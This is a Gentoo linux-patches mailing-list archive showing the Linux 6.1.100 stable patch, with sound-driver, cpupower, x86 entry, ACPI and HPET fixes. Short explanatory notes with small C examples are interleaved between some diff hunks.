+@@ -283,6 +283,13 @@ static const struct dmi_system_id yc_acp_quirk_table[] = {
+ 			DMI_MATCH(DMI_PRODUCT_NAME, "M5402RA"),
+ 		}
+ 	},
++	{
++		.driver_data = &acp6x_card,
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "ASUSTeK COMPUTER INC."),
++			DMI_MATCH(DMI_PRODUCT_NAME, "M5602RA"),
++		}
++	},
+ 	{
+ 		.driver_data = &acp6x_card,
+ 		.matches = {
+diff --git a/sound/soc/intel/boards/bytcr_rt5640.c b/sound/soc/intel/boards/bytcr_rt5640.c
+index d6ef8e850412b..ff879e173d51d 100644
+--- a/sound/soc/intel/boards/bytcr_rt5640.c
++++ b/sound/soc/intel/boards/bytcr_rt5640.c
+@@ -610,6 +610,17 @@ static const struct dmi_system_id byt_rt5640_quirk_table[] = {
+ 					BYT_RT5640_SSP0_AIF1 |
+ 					BYT_RT5640_MCLK_EN),
+ 	},
++	{
++		.matches = {
++			DMI_EXACT_MATCH(DMI_SYS_VENDOR, "ARCHOS"),
++			DMI_EXACT_MATCH(DMI_PRODUCT_NAME, "ARCHOS 101 CESIUM"),
++		},
++		.driver_data = (void *)(BYTCR_INPUT_DEFAULTS |
++					BYT_RT5640_JD_NOT_INV |
++					BYT_RT5640_DIFF_MIC |
++					BYT_RT5640_SSP0_AIF1 |
++					BYT_RT5640_MCLK_EN),
++	},
+ 	{
+ 		.matches = {
+ 			DMI_EXACT_MATCH(DMI_SYS_VENDOR, "ARCHOS"),
+diff --git a/sound/soc/soc-generic-dmaengine-pcm.c b/sound/soc/soc-generic-dmaengine-pcm.c
+index 3b99f619e37eb..bece8927b056c 100644
+--- a/sound/soc/soc-generic-dmaengine-pcm.c
++++ b/sound/soc/soc-generic-dmaengine-pcm.c
+@@ -318,6 +318,12 @@ static int dmaengine_copy_user(struct snd_soc_component *component,
+ 	return 0;
+ }
+ 
++static int dmaengine_pcm_sync_stop(struct snd_soc_component *component,
++				   struct snd_pcm_substream *substream)
++{
++	return snd_dmaengine_pcm_sync_stop(substream);
++}
++
+ static const struct snd_soc_component_driver dmaengine_pcm_component = {
+ 	.name		= SND_DMAENGINE_PCM_DRV_NAME,
+ 	.probe_order	= SND_SOC_COMP_ORDER_LATE,
+@@ -327,6 +333,7 @@ static const struct snd_soc_component_driver dmaengine_pcm_component = {
+ 	.trigger	= dmaengine_pcm_trigger,
+ 	.pointer	= dmaengine_pcm_pointer,
+ 	.pcm_construct	= dmaengine_pcm_new,
++	.sync_stop	= dmaengine_pcm_sync_stop,
+ };
+ 
+ static const struct snd_soc_component_driver dmaengine_pcm_component_process = {
+@@ -339,6 +346,7 @@ static const struct snd_soc_component_driver dmaengine_pcm_component_process = {
+ 	.pointer	= dmaengine_pcm_pointer,
+ 	.copy_user	= dmaengine_copy_user,
+ 	.pcm_construct	= dmaengine_pcm_new,
++	.sync_stop	= dmaengine_pcm_sync_stop,
+ };
+ 
+ static const char * const dmaengine_pcm_dma_channel_names[] = {
+diff --git a/sound/soc/soc-topology.c b/sound/soc/soc-topology.c
+index d68c48555a7e3..d3cbfa6a704f9 100644
+--- a/sound/soc/soc-topology.c
++++ b/sound/soc/soc-topology.c
+@@ -1101,15 +1101,28 @@ static int soc_tplg_dapm_graph_elems_load(struct soc_tplg *tplg,
+ 			break;
+ 		}
+ 
+-		route->source = elem->source;
+-		route->sink = elem->sink;
++		route->source = devm_kmemdup(tplg->dev, elem->source,
++					     min(strlen(elem->source),
++						 SNDRV_CTL_ELEM_ID_NAME_MAXLEN),
++					     GFP_KERNEL);
++		route->sink = devm_kmemdup(tplg->dev, elem->sink,
++					   min(strlen(elem->sink), SNDRV_CTL_ELEM_ID_NAME_MAXLEN),
++					   GFP_KERNEL);
++		if (!route->source || !route->sink) {
++			ret = -ENOMEM;
++			break;
++		}
+ 
+-		/* set to NULL atm for tplg users */
+-		route->connected = NULL;
+-		if (strnlen(elem->control, SNDRV_CTL_ELEM_ID_NAME_MAXLEN) == 0)
+-			route->control = NULL;
+-		else
+-			route->control = elem->control;
++		if (strnlen(elem->control, SNDRV_CTL_ELEM_ID_NAME_MAXLEN) != 0) {
++			route->control = devm_kmemdup(tplg->dev, elem->control,
++						      min(strlen(elem->control),
++							  SNDRV_CTL_ELEM_ID_NAME_MAXLEN),
++						      GFP_KERNEL);
++			if (!route->control) {
++				ret = -ENOMEM;
++				break;
++			}
++		}
+ 
+ 		/* add route dobj to dobj_list */
+ 		route->dobj.type = SND_SOC_DOBJ_GRAPH;
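The topology fix above stops the DAPM routes from pointing into the firmware image (elem->source and friends), which callers typically release once loading completes; duplicating into device-managed memory keeps the names valid for the card's lifetime. Note that devm_kmemdup() with a strlen()-based cap copies that many bytes only. As a sketch, one conventional alternative that also guarantees termination (helper name hypothetical, not what the patch uses):

	static const char *dup_route_str(struct device *dev, const char *s,
					 size_t maxlen)
	{
		size_t len = strnlen(s, maxlen);
		char *p = devm_kzalloc(dev, len + 1, GFP_KERNEL); /* +1 for NUL */

		if (p)
			memcpy(p, s, len);
		return p;
	}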
+diff --git a/sound/soc/sof/sof-audio.c b/sound/soc/sof/sof-audio.c
+index 061ab7289a6c3..b1141f4478168 100644
+--- a/sound/soc/sof/sof-audio.c
++++ b/sound/soc/sof/sof-audio.c
+@@ -328,7 +328,7 @@ sof_prepare_widgets_in_path(struct snd_sof_dev *sdev, struct snd_soc_dapm_widget
+ 			if (ret < 0) {
+ 				/* unprepare the source widget */
+ 				if (widget_ops[widget->id].ipc_unprepare &&
+-				    swidget && swidget->prepared) {
++				    swidget && swidget->prepared && swidget->use_count == 0) {
+ 					widget_ops[widget->id].ipc_unprepare(swidget);
+ 					swidget->prepared = false;
+ 				}
+diff --git a/sound/soc/ti/davinci-mcasp.c b/sound/soc/ti/davinci-mcasp.c
+index 4edf5b27e136b..c6ef8f92b25f1 100644
+--- a/sound/soc/ti/davinci-mcasp.c
++++ b/sound/soc/ti/davinci-mcasp.c
+@@ -1472,10 +1472,11 @@ static int davinci_mcasp_hw_rule_min_periodsize(
+ {
+ 	struct snd_interval *period_size = hw_param_interval(params,
+ 						SNDRV_PCM_HW_PARAM_PERIOD_SIZE);
++	u8 numevt = *((u8 *)rule->private);
+ 	struct snd_interval frames;
+ 
+ 	snd_interval_any(&frames);
+-	frames.min = 64;
++	frames.min = numevt;
+ 	frames.integer = 1;
+ 
+ 	return snd_interval_refine(period_size, &frames);
+@@ -1490,6 +1491,7 @@ static int davinci_mcasp_startup(struct snd_pcm_substream *substream,
+ 	u32 max_channels = 0;
+ 	int i, dir, ret;
+ 	int tdm_slots = mcasp->tdm_slots;
++	u8 *numevt;
+ 
+ 	/* Do not allow more then one stream per direction */
+ 	if (mcasp->substreams[substream->stream])
+@@ -1589,9 +1591,12 @@ static int davinci_mcasp_startup(struct snd_pcm_substream *substream,
+ 			return ret;
+ 	}
+ 
++	numevt = (substream->stream == SNDRV_PCM_STREAM_PLAYBACK) ?
++			 &mcasp->txnumevt :
++			 &mcasp->rxnumevt;
+ 	snd_pcm_hw_rule_add(substream->runtime, 0,
+ 			    SNDRV_PCM_HW_PARAM_PERIOD_SIZE,
+-			    davinci_mcasp_hw_rule_min_periodsize, NULL,
++			    davinci_mcasp_hw_rule_min_periodsize, numevt,
+ 			    SNDRV_PCM_HW_PARAM_PERIOD_SIZE, -1);
+ 
+ 	return 0;
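The McASP change threads the per-direction FIFO event count to the constraint callback through rule->private, replacing the hard-coded minimum of 64 frames. Whatever is passed there must outlive the substream, which is why the patch points at fields of the driver state rather than a stack variable. The general shape of the pattern (driver names illustrative):

	/* Constraint callback: reads its minimum from rule->private */
	static int min_period_rule(struct snd_pcm_hw_params *params,
				   struct snd_pcm_hw_rule *rule)
	{
		struct snd_interval *ps = hw_param_interval(params,
						SNDRV_PCM_HW_PARAM_PERIOD_SIZE);
		struct snd_interval frames;

		snd_interval_any(&frames);
		frames.min = *(u8 *)rule->private;	/* driver-owned storage */
		frames.integer = 1;
		return snd_interval_refine(ps, &frames);
	}

	/* Registered at open time; &priv->numevt must remain valid for
	 * the substream's lifetime (a stack variable here would be a bug) */
	snd_pcm_hw_rule_add(substream->runtime, 0,
			    SNDRV_PCM_HW_PARAM_PERIOD_SIZE,
			    min_period_rule, &priv->numevt,
			    SNDRV_PCM_HW_PARAM_PERIOD_SIZE, -1);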
+diff --git a/sound/soc/ti/omap-hdmi.c b/sound/soc/ti/omap-hdmi.c
+index 0dc0475670ffe..554e7896e8053 100644
+--- a/sound/soc/ti/omap-hdmi.c
++++ b/sound/soc/ti/omap-hdmi.c
+@@ -354,11 +354,7 @@ static int omap_hdmi_audio_probe(struct platform_device *pdev)
+ 	if (!card)
+ 		return -ENOMEM;
+ 
+-	card->name = devm_kasprintf(dev, GFP_KERNEL,
+-				    "HDMI %s", dev_name(ad->dssdev));
+-	if (!card->name)
+-		return -ENOMEM;
+-
++	card->name = "HDMI";
+ 	card->owner = THIS_MODULE;
+ 	card->dai_link =
+ 		devm_kzalloc(dev, sizeof(*(card->dai_link)), GFP_KERNEL);
+diff --git a/tools/power/cpupower/utils/helpers/amd.c b/tools/power/cpupower/utils/helpers/amd.c
+index c519cc89c97f4..0a56e22240fc8 100644
+--- a/tools/power/cpupower/utils/helpers/amd.c
++++ b/tools/power/cpupower/utils/helpers/amd.c
+@@ -41,6 +41,16 @@ union core_pstate {
+ 		unsigned res1:31;
+ 		unsigned en:1;
+ 	} pstatedef;
++	/* since fam 1Ah: */
++	struct {
++		unsigned fid:12;
++		unsigned res1:2;
++		unsigned vid:8;
++		unsigned iddval:8;
++		unsigned idddiv:2;
++		unsigned res2:31;
++		unsigned en:1;
++	} pstatedef2;
+ 	unsigned long long val;
+ };
+ 
+@@ -48,6 +58,10 @@ static int get_did(union core_pstate pstate)
+ {
+ 	int t;
+ 
++	/* Fam 1Ah onward do not use did */
++	if (cpupower_cpu_info.family >= 0x1A)
++		return 0;
++
+ 	if (cpupower_cpu_info.caps & CPUPOWER_CAP_AMD_PSTATEDEF)
+ 		t = pstate.pstatedef.did;
+ 	else if (cpupower_cpu_info.family == 0x12)
+@@ -61,12 +75,18 @@ static int get_did(union core_pstate pstate)
+ static int get_cof(union core_pstate pstate)
+ {
+ 	int t;
+-	int fid, did, cof;
++	int fid, did, cof = 0;
+ 
+ 	did = get_did(pstate);
+ 	if (cpupower_cpu_info.caps & CPUPOWER_CAP_AMD_PSTATEDEF) {
+-		fid = pstate.pstatedef.fid;
+-		cof = 200 * fid / did;
++		if (cpupower_cpu_info.family >= 0x1A) {
++			fid = pstate.pstatedef2.fid;
++			if (fid > 0x0f)
++				cof = (fid * 5);
++		} else {
++			fid = pstate.pstatedef.fid;
++			cof = 200 * fid / did;
++		}
+ 	} else {
+ 		t = 0x10;
+ 		fid = pstate.pstate.fid;
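From family 1Ah on there is no divisor at all: the 12-bit FID encodes the core frequency directly in 5 MHz steps, with values at or below 0x0f reserved (hence cof stays 0 for them). A standalone decode, assuming only the pstatedef2 bit layout shown above:

	#include <stdint.h>
	#include <stdio.h>

	/* fid sits in bits 11:0 of the P-state MSR on family 1Ah */
	static unsigned int fam1ah_core_freq_mhz(uint64_t msr)
	{
		unsigned int fid = msr & 0xfff;

		return fid > 0x0f ? fid * 5 : 0;	/* <= 0x0f is reserved */
	}

	int main(void)
	{
		printf("%u MHz\n", fam1ah_core_freq_mhz(0x3c0));	/* 4800 MHz */
		return 0;
	}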
+diff --git a/tools/testing/selftests/futex/functional/Makefile b/tools/testing/selftests/futex/functional/Makefile
+index a392d0917b4e5..994fa3468f170 100644
+--- a/tools/testing/selftests/futex/functional/Makefile
++++ b/tools/testing/selftests/futex/functional/Makefile
+@@ -1,6 +1,6 @@
+ # SPDX-License-Identifier: GPL-2.0
+ INCLUDES := -I../include -I../../ $(KHDR_INCLUDES)
+-CFLAGS := $(CFLAGS) -g -O2 -Wall -D_GNU_SOURCE -pthread $(INCLUDES) $(KHDR_INCLUDES)
++CFLAGS := $(CFLAGS) -g -O2 -Wall -D_GNU_SOURCE= -pthread $(INCLUDES) $(KHDR_INCLUDES)
+ LDLIBS := -lpthread -lrt
+ 
+ LOCAL_HDRS := \
+diff --git a/tools/testing/selftests/openat2/openat2_test.c b/tools/testing/selftests/openat2/openat2_test.c
+index 7fb902099de45..f9d2b0ec77564 100644
+--- a/tools/testing/selftests/openat2/openat2_test.c
++++ b/tools/testing/selftests/openat2/openat2_test.c
+@@ -5,6 +5,7 @@
+  */
+ 
+ #define _GNU_SOURCE
++#define __SANE_USERSPACE_TYPES__ // Use ll64
+ #include <fcntl.h>
+ #include <sched.h>
+ #include <sys/stat.h>
+diff --git a/tools/testing/selftests/vDSO/parse_vdso.c b/tools/testing/selftests/vDSO/parse_vdso.c
+index 413f75620a35b..4ae417372e9eb 100644
+--- a/tools/testing/selftests/vDSO/parse_vdso.c
++++ b/tools/testing/selftests/vDSO/parse_vdso.c
+@@ -55,14 +55,20 @@ static struct vdso_info
+ 	ELF(Verdef) *verdef;
+ } vdso_info;
+ 
+-/* Straight from the ELF specification. */
+-static unsigned long elf_hash(const unsigned char *name)
++/*
++ * Straight from the ELF specification...and then tweaked slightly, in order to
++ * avoid a few clang warnings.
++ */
++static unsigned long elf_hash(const char *name)
+ {
+ 	unsigned long h = 0, g;
+-	while (*name)
++	const unsigned char *uch_name = (const unsigned char *)name;
++
++	while (*uch_name)
+ 	{
+-		h = (h << 4) + *name++;
+-		if (g = h & 0xf0000000)
++		h = (h << 4) + *uch_name++;
++		g = h & 0xf0000000;
++		if (g)
+ 			h ^= g >> 24;
+ 		h &= ~g;
+ 	}
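The rewrite leaves the hash itself untouched; it only hoists the assignment out of the if-condition (clang warns on if (g = ...)) and confines the unsigned-char arithmetic to one cast. The same function, compilable standalone for comparison:

	#include <stdio.h>

	static unsigned long elf_hash(const char *name)
	{
		const unsigned char *p = (const unsigned char *)name;
		unsigned long h = 0, g;

		while (*p) {
			h = (h << 4) + *p++;
			g = h & 0xf0000000;
			if (g)
				h ^= g >> 24;
			h &= ~g;
		}
		return h;
	}

	int main(void)
	{
		printf("%#lx\n", elf_hash("printf"));	/* prints 0x77905a6 */
		return 0;
	}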
+diff --git a/tools/testing/selftests/vDSO/vdso_standalone_test_x86.c b/tools/testing/selftests/vDSO/vdso_standalone_test_x86.c
+index 8a44ff973ee17..27f6fdf119691 100644
+--- a/tools/testing/selftests/vDSO/vdso_standalone_test_x86.c
++++ b/tools/testing/selftests/vDSO/vdso_standalone_test_x86.c
+@@ -18,7 +18,7 @@
+ 
+ #include "parse_vdso.h"
+ 
+-/* We need a libc functions... */
++/* We need some libc functions... */
+ int strcmp(const char *a, const char *b)
+ {
+ 	/* This implementation is buggy: it never returns -1. */
+@@ -34,6 +34,20 @@ int strcmp(const char *a, const char *b)
+ 	return 0;
+ }
+ 
++/*
++ * The clang build needs this, although gcc does not.
++ * Stolen from lib/string.c.
++ */
++void *memcpy(void *dest, const void *src, size_t count)
++{
++	char *tmp = dest;
++	const char *s = src;
++
++	while (count--)
++		*tmp++ = *s++;
++	return dest;
++}
++
+ /* ...and two syscalls.  This is x86-specific. */
+ static inline long x86_syscall3(long nr, long a0, long a1, long a2)
+ {
+@@ -70,7 +84,7 @@ void to_base10(char *lastdig, time_t n)
+ 	}
+ }
+ 
+-__attribute__((externally_visible)) void c_main(void **stack)
++void c_main(void **stack)
+ {
+ 	/* Parse the stack */
+ 	long argc = (long)*stack;


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-07-18 12:15 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-07-18 12:15 UTC (permalink / raw
  To: gentoo-commits

commit:     4910d4b94b7c2762c4408285599268c9899da415
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Thu Jul 18 12:15:41 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Thu Jul 18 12:15:41 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=4910d4b9

Linux patch 6.1.100

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README              |    4 +
 1099_linux-6.1.100.patch | 3692 ++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 3696 insertions(+)

diff --git a/0000_README b/0000_README
index 6e536b9a..2650897a 100644
--- a/0000_README
+++ b/0000_README
@@ -439,6 +439,10 @@ Patch:  1098_linux-6.1.99.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.99
 
+Patch:  1099_linux-6.1.100.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.100
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1099_linux-6.1.100.patch b/1099_linux-6.1.100.patch
new file mode 100644
index 00000000..594ab69b
--- /dev/null
+++ b/1099_linux-6.1.100.patch
@@ -0,0 +1,3692 @@
+diff --git a/Documentation/admin-guide/cifs/usage.rst b/Documentation/admin-guide/cifs/usage.rst
+index 3766bf8a1c20e..a50047cf95ca2 100644
+--- a/Documentation/admin-guide/cifs/usage.rst
++++ b/Documentation/admin-guide/cifs/usage.rst
+@@ -722,40 +722,26 @@ Configuration pseudo-files:
+ ======================= =======================================================
+ SecurityFlags		Flags which control security negotiation and
+ 			also packet signing. Authentication (may/must)
+-			flags (e.g. for NTLM and/or NTLMv2) may be combined with
++			flags (e.g. for NTLMv2) may be combined with
+ 			the signing flags.  Specifying two different password
+ 			hashing mechanisms (as "must use") on the other hand
+ 			does not make much sense. Default flags are::
+ 
+-				0x07007
+-
+-			(NTLM, NTLMv2 and packet signing allowed).  The maximum
+-			allowable flags if you want to allow mounts to servers
+-			using weaker password hashes is 0x37037 (lanman,
+-			plaintext, ntlm, ntlmv2, signing allowed).  Some
+-			SecurityFlags require the corresponding menuconfig
+-			options to be enabled.  Enabling plaintext
+-			authentication currently requires also enabling
+-			lanman authentication in the security flags
+-			because the cifs module only supports sending
+-			laintext passwords using the older lanman dialect
+-			form of the session setup SMB.  (e.g. for authentication
+-			using plain text passwords, set the SecurityFlags
+-			to 0x30030)::
++				0x00C5
++
++			(NTLMv2 and packet signing allowed).  Some SecurityFlags
++			may require enabling a corresponding menuconfig option.
+ 
+ 			  may use packet signing			0x00001
+ 			  must use packet signing			0x01001
+-			  may use NTLM (most common password hash)	0x00002
+-			  must use NTLM					0x02002
+ 			  may use NTLMv2				0x00004
+ 			  must use NTLMv2				0x04004
+-			  may use Kerberos security			0x00008
+-			  must use Kerberos				0x08008
+-			  may use lanman (weak) password hash		0x00010
+-			  must use lanman password hash			0x10010
+-			  may use plaintext passwords			0x00020
+-			  must use plaintext passwords			0x20020
+-			  (reserved for future packet encryption)	0x00040
++			  may use Kerberos security (krb5)		0x00008
++			  must use Kerberos                             0x08008
++			  may use NTLMSSP               		0x00080
++			  must use NTLMSSP           			0x80080
++			  seal (packet encryption)			0x00040
++			  must seal (not implemented yet)               0x40040
+ 
+ cifsFYI			If set to non-zero value, additional debug information
+ 			will be logged to the system error log.  This field
+diff --git a/Makefile b/Makefile
+index c12da8fcb089b..54099eefe18ca 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 99
++SUBLEVEL = 100
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm/mach-davinci/pm.c b/arch/arm/mach-davinci/pm.c
+index 8aa39db095d76..2c5155bd376ba 100644
+--- a/arch/arm/mach-davinci/pm.c
++++ b/arch/arm/mach-davinci/pm.c
+@@ -61,7 +61,7 @@ static void davinci_pm_suspend(void)
+ 
+ 	/* Configure sleep count in deep sleep register */
+ 	val = __raw_readl(pm_config.deepsleep_reg);
+-	val &= ~DEEPSLEEP_SLEEPCOUNT_MASK,
++	val &= ~DEEPSLEEP_SLEEPCOUNT_MASK;
+ 	val |= pm_config.sleepcount;
+ 	__raw_writel(val, pm_config.deepsleep_reg);
+ 
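The davinci change is a one-character fix: the trailing comma invoked C's comma operator, fusing the two register updates into a single expression. Here that happened to be harmless, since the comma operator still evaluates both operands left to right, but the pattern breaks down as soon as control flow is involved, as this standalone demonstration shows:

	#include <stdio.h>

	int main(void)
	{
		unsigned int val = 0xff;

		/* Comma operator: both sides evaluate in order, so this
		 * behaves like two statements... */
		val &= ~0xf0u, val |= 0x30u;
		printf("%#x\n", val);		/* 0x3f */

		/* ...but it is ONE statement, so a guard added later
		 * covers both writes, not just the first line: */
		val = 0x0f;
		if (0)
			val &= ~0xf0u,		/* comma, not ';' */
		val |= 0x30u;			/* also skipped! */
		printf("%#x\n", val);		/* 0xf, not 0x3f */

		return 0;
	}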
+diff --git a/arch/s390/include/asm/processor.h b/arch/s390/include/asm/processor.h
+index c907f747d2a04..26861b09293f1 100644
+--- a/arch/s390/include/asm/processor.h
++++ b/arch/s390/include/asm/processor.h
+@@ -250,8 +250,8 @@ static inline void __load_psw(psw_t psw)
+  */
+ static __always_inline void __load_psw_mask(unsigned long mask)
+ {
++	psw_t psw __uninitialized;
+ 	unsigned long addr;
+-	psw_t psw;
+ 
+ 	psw.mask = mask;
+ 
+diff --git a/arch/x86/entry/entry_64.S b/arch/x86/entry/entry_64.S
+index 6624806e6904b..a114338380a6f 100644
+--- a/arch/x86/entry/entry_64.S
++++ b/arch/x86/entry/entry_64.S
+@@ -167,22 +167,9 @@ SYM_INNER_LABEL(entry_SYSCALL_64_after_hwframe, SYM_L_GLOBAL)
+ 	jne	swapgs_restore_regs_and_return_to_usermode
+ 
+ 	/*
+-	 * SYSCALL clears RF when it saves RFLAGS in R11 and SYSRET cannot
+-	 * restore RF properly. If the slowpath sets it for whatever reason, we
+-	 * need to restore it correctly.
+-	 *
+-	 * SYSRET can restore TF, but unlike IRET, restoring TF results in a
+-	 * trap from userspace immediately after SYSRET.  This would cause an
+-	 * infinite loop whenever #DB happens with register state that satisfies
+-	 * the opportunistic SYSRET conditions.  For example, single-stepping
+-	 * this user code:
+-	 *
+-	 *           movq	$stuck_here, %rcx
+-	 *           pushfq
+-	 *           popq %r11
+-	 *   stuck_here:
+-	 *
+-	 * would never get past 'stuck_here'.
++	 * SYSRET cannot restore RF.  It can restore TF, but unlike IRET,
++	 * restoring TF results in a trap from userspace immediately after
++	 * SYSRET.
+ 	 */
+ 	testq	$(X86_EFLAGS_RF|X86_EFLAGS_TF), %r11
+ 	jnz	swapgs_restore_regs_and_return_to_usermode
+diff --git a/arch/x86/entry/entry_64_compat.S b/arch/x86/entry/entry_64_compat.S
+index b14b8cd85eb23..74a2f418e6745 100644
+--- a/arch/x86/entry/entry_64_compat.S
++++ b/arch/x86/entry/entry_64_compat.S
+@@ -90,10 +90,6 @@ SYM_INNER_LABEL(entry_SYSENTER_compat_after_hwframe, SYM_L_GLOBAL)
+ 
+ 	cld
+ 
+-	IBRS_ENTER
+-	UNTRAIN_RET
+-	CLEAR_BRANCH_HISTORY
+-
+ 	/*
+ 	 * SYSENTER doesn't filter flags, so we need to clear NT and AC
+ 	 * ourselves.  To save a few cycles, we can check whether
+@@ -117,6 +113,16 @@ SYM_INNER_LABEL(entry_SYSENTER_compat_after_hwframe, SYM_L_GLOBAL)
+ 	jnz	.Lsysenter_fix_flags
+ .Lsysenter_flags_fixed:
+ 
++	/*
++	 * CPU bugs mitigations mechanisms can call other functions. They
++	 * should be invoked after making sure TF is cleared because
++	 * single-step is ignored only for instructions inside the
++	 * entry_SYSENTER_compat function.
++	 */
++	IBRS_ENTER
++	UNTRAIN_RET
++	CLEAR_BRANCH_HISTORY
++
+ 	movq	%rsp, %rdi
+ 	call	do_SYSENTER_32
+ 	/* XEN PV guests always use IRET path */
+diff --git a/arch/x86/lib/retpoline.S b/arch/x86/lib/retpoline.S
+index 055955c9bfcb7..7880e2a7ec6ad 100644
+--- a/arch/x86/lib/retpoline.S
++++ b/arch/x86/lib/retpoline.S
+@@ -107,6 +107,7 @@ __EXPORT_THUNK(srso_alias_untrain_ret)
+ /* dummy definition for alternatives */
+ SYM_START(srso_alias_untrain_ret, SYM_L_GLOBAL, SYM_A_NONE)
+ 	ANNOTATE_UNRET_SAFE
++	ANNOTATE_NOENDBR
+ 	ret
+ 	int3
+ SYM_FUNC_END(srso_alias_untrain_ret)
+@@ -261,7 +262,6 @@ SYM_CODE_START(__x86_return_thunk)
+ 	UNWIND_HINT_FUNC
+ 	ANNOTATE_NOENDBR
+ 	ANNOTATE_UNRET_SAFE
+-	ANNOTATE_NOENDBR
+ 	ret
+ 	int3
+ SYM_CODE_END(__x86_return_thunk)
+diff --git a/drivers/acpi/processor_idle.c b/drivers/acpi/processor_idle.c
+index 6f613eef28879..18f4334a96919 100644
+--- a/drivers/acpi/processor_idle.c
++++ b/drivers/acpi/processor_idle.c
+@@ -16,7 +16,6 @@
+ #include <linux/acpi.h>
+ #include <linux/dmi.h>
+ #include <linux/sched.h>       /* need_resched() */
+-#include <linux/sort.h>
+ #include <linux/tick.h>
+ #include <linux/cpuidle.h>
+ #include <linux/cpu.h>
+@@ -388,25 +387,24 @@ static void acpi_processor_power_verify_c3(struct acpi_processor *pr,
+ 	return;
+ }
+ 
+-static int acpi_cst_latency_cmp(const void *a, const void *b)
++static void acpi_cst_latency_sort(struct acpi_processor_cx *states, size_t length)
+ {
+-	const struct acpi_processor_cx *x = a, *y = b;
++	int i, j, k;
+ 
+-	if (!(x->valid && y->valid))
+-		return 0;
+-	if (x->latency > y->latency)
+-		return 1;
+-	if (x->latency < y->latency)
+-		return -1;
+-	return 0;
+-}
+-static void acpi_cst_latency_swap(void *a, void *b, int n)
+-{
+-	struct acpi_processor_cx *x = a, *y = b;
++	for (i = 1; i < length; i++) {
++		if (!states[i].valid)
++			continue;
+ 
+-	if (!(x->valid && y->valid))
+-		return;
+-	swap(x->latency, y->latency);
++		for (j = i - 1, k = i; j >= 0; j--) {
++			if (!states[j].valid)
++				continue;
++
++			if (states[j].latency > states[k].latency)
++				swap(states[j].latency, states[k].latency);
++
++			k = j;
++		}
++	}
+ }
+ 
+ static int acpi_processor_power_verify(struct acpi_processor *pr)
+@@ -451,10 +449,7 @@ static int acpi_processor_power_verify(struct acpi_processor *pr)
+ 
+ 	if (buggy_latency) {
+ 		pr_notice("FW issue: working around C-state latencies out of order\n");
+-		sort(&pr->power.states[1], max_cstate,
+-		     sizeof(struct acpi_processor_cx),
+-		     acpi_cst_latency_cmp,
+-		     acpi_cst_latency_swap);
++		acpi_cst_latency_sort(&pr->power.states[1], max_cstate);
+ 	}
+ 
+ 	lapic_timer_propagate_broadcast(pr);
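The open-coded replacement is an insertion sort that swaps only the latency values of valid C-states, leaving every other field in place; the old sort() callbacks quietly treated invalid entries as equal, which breaks the transitivity lib/sort expects of its comparison. The same algorithm, reduced to an array with a validity mask:

	#include <stdbool.h>
	#include <stdio.h>

	static void sort_valid(unsigned int *lat, const bool *valid, int n)
	{
		for (int i = 1; i < n; i++) {
			if (!valid[i])
				continue;
			/* k tracks the nearest valid slot above j */
			for (int j = i - 1, k = i; j >= 0; j--) {
				if (!valid[j])
					continue;
				if (lat[j] > lat[k]) {
					unsigned int t = lat[j];
					lat[j] = lat[k];
					lat[k] = t;
				}
				k = j;
			}
		}
	}

	int main(void)
	{
		unsigned int lat[] = { 40, 10, 0, 30, 20 };
		bool valid[] = { true, true, false, true, true };

		sort_valid(lat, valid, 5);
		for (int i = 0; i < 5; i++)
			printf("%u ", lat[i]);	/* 10 20 0 30 40 */
		printf("\n");
		return 0;
	}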
+diff --git a/drivers/char/hpet.c b/drivers/char/hpet.c
+index ee71376f174b7..3bc1d9243dbd0 100644
+--- a/drivers/char/hpet.c
++++ b/drivers/char/hpet.c
+@@ -289,8 +289,13 @@ hpet_read(struct file *file, char __user *buf, size_t count, loff_t * ppos)
+ 	if (!devp->hd_ireqfreq)
+ 		return -EIO;
+ 
+-	if (count < sizeof(unsigned long))
+-		return -EINVAL;
++	if (in_compat_syscall()) {
++		if (count < sizeof(compat_ulong_t))
++			return -EINVAL;
++	} else {
++		if (count < sizeof(unsigned long))
++			return -EINVAL;
++	}
+ 
+ 	add_wait_queue(&devp->hd_waitqueue, &wait);
+ 
+@@ -314,9 +319,16 @@ hpet_read(struct file *file, char __user *buf, size_t count, loff_t * ppos)
+ 		schedule();
+ 	}
+ 
+-	retval = put_user(data, (unsigned long __user *)buf);
+-	if (!retval)
+-		retval = sizeof(unsigned long);
++	if (in_compat_syscall()) {
++		retval = put_user(data, (compat_ulong_t __user *)buf);
++		if (!retval)
++			retval = sizeof(compat_ulong_t);
++	} else {
++		retval = put_user(data, (unsigned long __user *)buf);
++		if (!retval)
++			retval = sizeof(unsigned long);
++	}
++
+ out:
+ 	__set_current_state(TASK_RUNNING);
+ 	remove_wait_queue(&devp->hd_waitqueue, &wait);
+@@ -671,12 +683,24 @@ struct compat_hpet_info {
+ 	unsigned short hi_timer;
+ };
+ 
++/* 32-bit types would lead to different command codes which should be
++ * translated into 64-bit ones before passed to hpet_ioctl_common
++ */
++#define COMPAT_HPET_INFO       _IOR('h', 0x03, struct compat_hpet_info)
++#define COMPAT_HPET_IRQFREQ    _IOW('h', 0x6, compat_ulong_t)
++
+ static long
+ hpet_compat_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
+ {
+ 	struct hpet_info info;
+ 	int err;
+ 
++	if (cmd == COMPAT_HPET_INFO)
++		cmd = HPET_INFO;
++
++	if (cmd == COMPAT_HPET_IRQFREQ)
++		cmd = HPET_IRQFREQ;
++
+ 	mutex_lock(&hpet_mutex);
